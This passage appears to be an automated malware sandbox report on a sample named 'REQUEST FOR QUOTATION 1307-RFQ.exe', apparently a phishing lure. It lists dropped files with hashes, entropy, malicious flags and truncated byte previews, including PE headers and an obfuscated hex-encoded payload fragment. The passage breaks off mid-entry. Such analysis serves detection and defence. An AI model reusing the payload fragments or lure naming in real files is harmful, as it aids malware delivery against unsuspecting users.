                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1306624
                                                                                                                                                                                                                            Entropy (8bit):4.794340261233765
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:wNwj4GJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:wS4GJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:5725FD813D4A6C77E6F92806219A08E7
                                                                                                                                                                                                                            SHA1:8A7C0CD6EEC577BD9741808F84231C287B3AE396
                                                                                                                                                                                                                            SHA-256:462E3C7F265872048518DD94AB260B4D09B1A0E3E1C766BDDB630D93286EDF9D
                                                                                                                                                                                                                            SHA-512:43C2706B9A8F219E8BB7A23C153C1FEBF0712FB747EC6ED74450A556019D1364B945AEA134BD810D625B6E90F2E8ADEF6507987FA934275AB95E9F7D31F85419
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@.............................P............ ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc.......p......................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1515008
                                                                                                                                                                                                                            Entropy (8bit):5.131822353829867
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:4WDntIfGpOGJ0eeQ2yPyzc+E7xonyVGc/dT5N:zZIeLJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:B90B4ED45B0D52E6BEC8F6345F38EA76
                                                                                                                                                                                                                            SHA1:ED68BB3E625477A5FC15A286D0B02D226B226610
                                                                                                                                                                                                                            SHA-256:591838CE5203E748F6216486A128250E6235E8D13E3ADF6C65BBBB17517C67C1
                                                                                                                                                                                                                            SHA-512:C04684EA74DE3A2C881925C8127F5531733C8E666BA27F7C151D504BF6587C520F1E69C7EA54FBEC3266A6F042EC194F450DC6B90DB418D55FC647AD1CB473CF
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@..............................!........... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...............>..............@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1291776
                                                                                                                                                                                                                            Entropy (8bit):4.755479335902617
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:HIh0GJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:m0GJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:983CA2231DB80CCBE02159BC2D216788
                                                                                                                                                                                                                            SHA1:34BBABB95BBE292E618FCAD2B89DFE76A563E40A
                                                                                                                                                                                                                            SHA-256:B4FF9B9D207D234C9B2DEA99D5C62552FB0065EF45EE000FFD49DBD2ED4F60C2
                                                                                                                                                                                                                            SHA-512:1700EA0456F1AC01D176A1A27EC2E6628C54E97F957B2F2558D3EF15A5B1D1361900008EC053F981CCAF30D50016ED160E0912B2CB6C96945532FE81A5191FB5
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@.......................................... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc.......0......................@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1638400
                                                                                                                                                                                                                            Entropy (8bit):5.13558109396103
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:e8oRswt2ioQ3J+R3GJ0eeQ2yPyzc+E7xonyVGc/dT5N:e8oRxoF2JLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:66F56B95AA9DCB805BDA06AF4383FFF0
                                                                                                                                                                                                                            SHA1:0AB5636DFCC5BFDACC3814B067A428F02C83CE36
                                                                                                                                                                                                                            SHA-256:950E7969F42EC52935A9CD6FDA265B69F38E884D8EACD22AA6EEF5B948F90D0E
                                                                                                                                                                                                                            SHA-512:7C17B0B14E99199938AD412E763401713E06DF1EE34598A716261FC44044C22B9F4DB0F080179ED7CD220C77E21338AF5990D59DEB46E84BB284423477DDF63B
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@..............................#........... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc............... ..............@...........................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1448448
                                                                                                                                                                                                                            Entropy (8bit):4.922742900407421
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:df8HQlTMxHwJ07w3GJ0eeQ2yPyzc+E7xonyVGc/dT5N:dkHQlawJ0RJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:6D3DEC020033061C128F1BCABED269A9
                                                                                                                                                                                                                            SHA1:C90C2A8DE57558614B9395C55F1A8A73BE291AFB
                                                                                                                                                                                                                            SHA-256:A66B20187E41739E4B7309AD63472EB9721D3375DE86A1A716B72F35C6768FDF
                                                                                                                                                                                                                            SHA-512:47EDD382E4F779A38D719D41786660F92BDE93E51A1A10320123052F3A983C290721E1E4EBD1018DD57D01DC529FA40A3331BCB3F8D9A9BD5830D3DEDD9F7932
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x..............a.......r.......r...............r.......r.......r.......ry......r{......r......Rich....................PE..d...B{.?.........."............................@.............................` .....O..... .......... ......................................8b..........................................T.......................(...................@...(...pa..`....................text............................... ..`.rdata..............................@..@.data....&...........z..............@....pdata........... ..................@..@.didat.. ...........................@....rsrc...............................@..@.reloc...............:..............@...................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1534464
                                                                                                                                                                                                                            Entropy (8bit):7.117246925140697
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:oSEmYD6gjGPG45QVDkfX4lyTyeGJ0eeQ2yPyzc+E7xonyVGc/dT5N:o5mYD6g2GWQVQfeyT6JLeQVPyzc+E7xX
                                                                                                                                                                                                                            MD5:B31F0E8F5DDB2787DDF942CA4B81A683
                                                                                                                                                                                                                            SHA1:05537695C6BBF8ADA2D93B887D5FD0C563BC6751
                                                                                                                                                                                                                            SHA-256:3472CF401D9FFC1914D0CFFA3A46B6C06C795D1842DACA5724C8820095481724
                                                                                                                                                                                                                            SHA-512:618EC28F2E9C287433679E30D44514AE932E154C9B0CFCFD448EBD266090921A3EDCE02994D27B4BA0DACE0E6311DF982238FF0079AFF4ADE430AD7C2CCC4B4B
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."x..f..Ef..Ef..EoaKEd..Err.De..Err.DB..Err.Dh..Err.D}..Ef..E...Err.D]..Err'Eg..Err.Dg..ERichf..E........................PE..d..."..m.........."..........4......@:.........@.......................................... .......... ..........................................,............`...N.................. ...T...........................p...................X...h...@....................text.............................. ..`.rdata...\.......^..................@..@.data....Y.......8..................@....pdata...N...`...P..................@..@.didat...............l..............@....rsrc................n..............@..@.reloc..............................@...................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):65150
                                                                                                                                                                                                                            Entropy (8bit):7.912587280810623
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:q528cpUrnN+5sgs/My793OPth/6HCCzdUYQAiCkQ77k:ctcUrc1skc9eVApUYrRw
                                                                                                                                                                                                                            MD5:BF264AFD2ACCFB606C3DB1D6B38D3EE9
                                                                                                                                                                                                                            SHA1:A17D840046D3972A04B18B31360648710E4FEDBA
                                                                                                                                                                                                                            SHA-256:B537F7A79EC38C005ED86E177FFC55364B34200C1E75BAEC4C5A9402457C3DB9
                                                                                                                                                                                                                            SHA-512:42BC231E4F74730A94BCC02CF70D456ED869C040C4FBF66A422DF67B4F16C77605592977A6EE480B072F9827C84BF60BF61012367A19411A82FBBBA7AEDC445B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:EA06..n...x.Z.F.T.L&3mv.6....Y.2cG..iuY..O.Qj`..`.x....j8..j ..P.x..U...q......U..=.O.3y.zY'.....{>.]'UX..I).W.6..j.l.J&.K-b{9..-f.u...jl..u........$..H.Vf.....'.y.2cg..>...b!E..@%...mU.....[]:.>.G....m..S..z|....f4.(..(`.]..5[...U~.`...+6.O@<2.....|Qj=>p.=..E...v.;..h`....J.."`....Q.U.......Q...t...........A..%3.....8.....z.Q..-31..................R... ..2mB..3szfg.Q.....u>.C..).O.....=...[>.....?.^.=...kU.........`.LTo...P....@....M@.....!.<' .DX.h........7.B.Y.....FmQ.....F.7.lh...>M...(....'..&3...6.....6..<.@.....~.L&\.8.Q\.B....._$..f.....G..).J..7...6.:.>aN..4^..U.F`S.m..W.E......G.M8.P'b./..nT...3v...:...r.S.U.=*;G..r*d.z..n..-R.T.T.v.U>a1.^..I..[0..h...J.*..&..H..y.U+.i.r.G.N(...^....q{.^a.....;.x.y.@.....d...S.|.cK..#6.}.+S......mW..0.y...7.Gh.......Ll ... .Lf./M:mM.l,.zd.........z.x...W....{....X..cG..lq...O.G@.........UX.JcE...<..Z.-....j.676....=6.y.Zf...Zc|..i...*......H..u0..y..=Fka..&:....S...[...E.R....F;..u.J.Va1.Z" .L..1.V.
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):14682
                                                                                                                                                                                                                            Entropy (8bit):7.631699543341731
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:ITYznwyHtzwpHjuAlYRgqRjJODF7kpLDDul6fN2p3U:IAwyHtzwBKWpqRjYkJfuls
                                                                                                                                                                                                                            MD5:96AAEF7AC0843F1F9CC3BA9BBB46DB93
                                                                                                                                                                                                                            SHA1:98D47CE4BE012A3F31BC8FADAEDA5FA91410E3D8
                                                                                                                                                                                                                            SHA-256:D505711C6CFE113DC7AA52599212A5EC8E3BFC54DD9863393E96D33AA7624C40
                                                                                                                                                                                                                            SHA-512:54855A8765F39F25542C1B161FE758987018195D72960709E82F14A3E5175608FFB6449EC94B31254C4BD3E27F03BF4467C67A6E31A7F7C8FC108416EA5C93D6
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):93696
                                                                                                                                                                                                                            Entropy (8bit):6.855141524180877
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:qk2l6b8rnOGacyU1DZXIRAbxrEnkvUtuiu04D4kA9:qk2lKGacDpImbxr4kvAuiu0m4/9
                                                                                                                                                                                                                            MD5:FB739F68BFB97FE057BBCB896ABC2D45
                                                                                                                                                                                                                            SHA1:5B8846118EB3CAB76C70688028844B67787717D1
                                                                                                                                                                                                                            SHA-256:D9134BA21002B1FB40B1AB67DD61CE11AA3E1173A5D8B7715BC0633C439EB7E5
                                                                                                                                                                                                                            SHA-512:C1CEA4632D0D26396041BD89619B8897B13D07CB4947D92EC2FB2E76C867BE47DDF6EE7DD9ADF2955AEF379B91629FF69F395D100911534F68963A53AAE4BE5C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:...EPQHT\016..N6.O0U7L1G.1KU03TOPESQHTX016QGN6GO0U7L1GQ1KU03.OPE]N.ZX.8.p.Oz.nd=^?.7#^,'Q^t,1+=><t:U.D$)n_)ot.dl\(5TeX=9pOPESQHT.u16.FM6.uE.7L1GQ1KU.3VN[D.QH0Y01>QGN6GO>.6L1gQ1K.13TO.ESqHTX216UGN6GO0U3L1GQ1KU0.UOPGSQHTX036..N6WO0E7L1GA1KE03TOPECQHTX016QGN6..1U|L1GQ.JU.6TOPESQHTX016QGN6GO0.6L=GQ1KU03TOPESQHTX016QGN6GO0U7L1GQ1KU03TOPESQHTX016QGN.GO8U7L1GQ1KU03\oPE.QHTX016QGN6i;U-CL1GESJU0.TOP!RQHVX016QGN6GO0U7L.GQQe'CA7OPE.THTX.06QAN6G)1U7L1GQ1KU03TO.ES.f&=\^UQGB6GO0.6L1EQ1K913TOPESQHTX016.GNtGO0U7L1GQ1KU03TO..RQHTX0y6QGL6BO(.7L..Q1HU03.OPC3.HT.016QGN6GO0U7L1GQ1KU03TOPESQHTX016QGN6GO0U7L.:.>...Z'.ESQHTX135UAF>GO0U7L1G/1KUv3TO.ESQ.TX0.6QG#6GO.U7LOGQ15U030OPE!QHT9016.GN6(O0UYL1G/1KU.1|PPEY{nTZ..6QMN..<.U7F.FQ1O&.3TE.GSQL'{01<.DN6C<.U7F.CQ1O&.3TE.@SQL~.02.GAN6\ .U7F1D.$MU0(~iPG{hHTR0..QD.#AO0N.n1E.8KU4..<MESW`.X0;BXGN4.E0U3f/EyrKU:.v1CESUcTr.O"QGJ.Ge.+"L1Cz1awN%TOTnS{j*O012zGd0m-0'.@17R^*U05|.PEYy.TX61.kG08GO4WX.1G[.a.0..OPCSy.TX61..GN0GgdU7J1o.1KS0.nOx.SQNTpa16WGd.G1.U7H.@/.KU4.B1aESU.R 0
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):143378
                                                                                                                                                                                                                            Entropy (8bit):2.994192631471002
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:AIXLr4g+F05BOo1d90FlDE/A6by8yBGcuZ9Izy2ul3mrWVjjrqnBaAJZdjureb3T:H3fjqDcIGcuZ9Izy2ul3mrWVjqnBaA
                                                                                                                                                                                                                            MD5:38A8D46BEB538CBB9CB9C0915A8041A5
                                                                                                                                                                                                                            SHA1:8E1EF81D77A8FF8D05E113FE84F341C8A48970E5
                                                                                                                                                                                                                            SHA-256:F32A7AAC99BAFF5CD52D2635089E85002303B1C6823851CBE1F8A4ACFE1DA33E
                                                                                                                                                                                                                            SHA-512:136FE7D8FAE12448FD8BC6F34EC3EADBD2ED9022C569413ACC419A6B03B4B962086E4AF2371A85000E903004190E04A2457F9B86953229F3107989356603AD0C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:dowp0dowpxdowp5dowp5dowp8dowpbdowpedowpcdowp8dowp1dowpedowpcdowpcdowpcdowp0dowp2dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowpbdowp8dowp6dowpbdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowp4dowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowp6dowpbdowpadowp7dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowp8dowpbdowp8dowp6dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowpadowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowpcdowpbdowpadowp6dowpcdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowpedowpbdowp8dowp3dowp3dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp9dowp0dowpbdowp9dowp3dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp9dowp2dowpbdowpadowp2dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp9dowp4dowpbdowp8dowp6dowp4dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):12320
                                                                                                                                                                                                                            Entropy (8bit):7.984808590630635
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:uEYV+F1OijK5E4L22aF2aC6AycieNOfXT4ZkVqNgXO5YHws7iqUpDtKHkIyVfhL2:uEY2N4LwC6Ayc5OpeRqws7ilzezy/zD+
                                                                                                                                                                                                                            MD5:0423C796EE1FF04F0D7D644FD1DAE511
                                                                                                                                                                                                                            SHA1:8D790D379AF65E17083E35229BA8DE267CDC96D0
                                                                                                                                                                                                                            SHA-256:E84343356F0309722F5D29147B24D5627EA5A081E5E593BBEF54C549896DDC3D
                                                                                                                                                                                                                            SHA-512:5A7D49EEEC91FFCB46A053EA7F9CCA3E5E415EDA3C497AFF09D378267FA81168E3808DE7E2A70EF15851CE4C36801219FE203AA795558573EDC3A65E695C83B7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.D'...Jw.i|O`.Q..8.E.R.S.+....G....".....~.D..^...Z.!i....N.1j.F..Y.}......)c...p.W4..^..}g%.2...2RA.....'O..Cpq.)H.J.T..K....P...D....88R...oM.>.f...hq|...r...H.(..b(7..=..CIV(...D.......#...-._.<v...IA..:.....].:....i.\..5....!...Du....:#2.Z.?..qt...t.l...vQw..UFZ.#n@.D....q.)I#..#d@.7.D.....A...]....Q..}.x..2<..8e...srS.._....O.zy.....W..A.k.......5..Q-.:1.F.vE9.p..y:....7x.k'(..U.......&.....X4.m......&\.|...[lK..=...*....qM...3......z7.'.......fo.....]{....4q...f...R1...f..a..;JF/.y....^a:.W...|...*.?.N.....f..1..P...XB.......e.j..9...o........#.c...cn.`........vI5.u.|s....9^.".P....8...#i....!.....@......].3*..2..gx....v.x'..?...;..Xb.0x.R!.0w-.8..@.6v.......z.....p#....a:a^....E:.H.&.0..ycF.M....k.eRj0..F.we....S).a..Ei....\.c.-....A.....\.:G....9........w"..t.d-...t.*.:...R.>...b~.,....."......@...&{2(..UW.}..9fs.]..I.L..6..Of.;.$.r.c..QO..$..C."..R......y...aO..W.-............H6.c.&.....Ll.b..;...s..M.pA..1..........P....
                                                                                                                                                                                                                            Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):2313
                                                                                                                                                                                                                            Entropy (8bit):5.133574766951497
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786N:Z070s0Y0q0mF7Dm56
                                                                                                                                                                                                                            MD5:9EAD220D2CD6CE9CFC6FBA7144F5AB75
                                                                                                                                                                                                                            SHA1:0CEDF5D63AB2517D127723653E7215154B793E8A
                                                                                                                                                                                                                            SHA-256:7AFABFFEF10AF2CED0B7C5374B6045EF34E0386EB6415957EC94083531034A0D
                                                                                                                                                                                                                            SHA-512:8DFE89BE0AB5785D6D471C2BBABCB27026ECA4DBA5ADDF4F8A2FDD02A8EF24ED3F843F8FF26E665D038314293D58D3FBCE5AA24D3BABB84352BD8F735BE77E57
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy
                                                                                                                                                                                                                            Process:C:\Windows\System32\wbengine.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                                                                            Entropy (8bit):0.7994900643464797
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:wzj/wwlTS7Pj/QP/PNPzP7zapDfYDq7PEpsGs/rt9:S/www7IMgQj9
                                                                                                                                                                                                                            MD5:9972B85AAD6C7AEE98B5EB5BE4F27564
                                                                                                                                                                                                                            SHA1:DD9F05A1F0AB697D9718034A4E13A02EAADEA0E4
                                                                                                                                                                                                                            SHA-256:4C128EBAFA8C0A31D3FF0DBC3BFC10BF4FCCA40567B3A08802CD483A227CCAFC
                                                                                                                                                                                                                            SHA-512:9905F0A0AFCD238D65B1D2D9071F35D435CECF39477A176A7F6F95DF4EA350BA50B6FA60670ABD69C881053C8719BF3935412E59770B4C6110BA710DFD622AD8
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.(..@...@...........................................!...........................h..........m.............(......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O............u...O..........W.B.E.n.g.i.n.e...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.W.i.n.d.o.w.s.B.a.c.k.u.p.\.W.B.E.n.g.i.n.e...0...e.t.l...........P.P.h..........m................................................................8.B....m....19041.1.amd64fre.vb_release.191206-1406.....,.@....m...............'"a.-....spp.pdb...........@....m.....T.c..i.\.C.s"8@....vssvc.pdb......./.@....m....W.p.D.......]....vssapi.pdb......-.@....m.....\..Q....T*&.......udfs.pdb........0.@....m......B..,`..9..4.....ifsutil.pdb.....-.@....m....I:...S%9.`...'.R....uudf.pdb........1.@....m...........1$OI"......wbengine.pdb................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):12320
                                                                                                                                                                                                                            Entropy (8bit):7.9881906884411285
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:jlXcDvBQ6WOSKPjjc6tmcm9zP9UD7354x:ZXUBQ9Or06tbmMDz5w
                                                                                                                                                                                                                            MD5:E731B2EDAA1DA307D7F05C94F0BCD55D
                                                                                                                                                                                                                            SHA1:4A62D5169B97377C61A36B99457F94A7BE616975
                                                                                                                                                                                                                            SHA-256:7AAD48B778BDBFFDEAB26C5EC2DDEA1BE67CDCF7BDD7F75555E0216FF816FF1D
                                                                                                                                                                                                                            SHA-512:1B02F4F8F691E852BBFC30AE80B633014AE0FFCC8DF9183C8A6DDDAF6816EBFD17EB108A19308352D4929B305D59B9237F1066349CF8E8B727647F4451BD95D8
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:......?sm..<......=M..r.l...Z.A..m...GOh..DC.. ..d|..r*....'d..v...l..e.R.f..g.K.5...v.t...b..`..b...(..y.".......Z.{77+..?_D...M.av..&I..x..|..%.3.....c^g..5.=....v.;...98G..=o..s.V..KM.v....5.......1..x..y...5.....p....CY|..@"I...}..WC.I....@..X.i&`..3i.0..%9+yi+......l.].x<...3.3.4$[.=j.N....D?.j ......e.5.aq........_E.D.P.d....LPb{...9O....J...z.B.L..kI+.l...<7+..;Q...........D....t.p......5<A.{t..6...b..Ij.)~..gW9V.H.L...,.ds!.&.&.O.7vPe!_s........v.s.......2.|......J...7S..bs.2q.M..`i...[._*....y.|.....Ll..}....!.#YH..9.D..\&t.m.#.m.^iN.%..X->u..@1.....(.D.W.{...v.iv.....V.Y.yQB...e.Z[..%[..........r]..k.._......,..e..6..$c....g..O.Yl.M.#.....X...k...[...5.R@x...........ss(...."..|..z...;.%.w$..A...E......a..~-..5...2..F99.7.|.;.%...(..R.T.s=.7..$.......n..h.P..g.....,.D...-.3b`A...DFB..j.1...7.^.k6.]O?lR.j.u].....*...?{+iI.h.kc.>...^.Lt...t.+...t.....$.....pF].,}Q....L.;.<b.5.E.. .;.._>l..Z..Q....0...2.yA.F.f-...?.&k.....:.;..s
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1257472
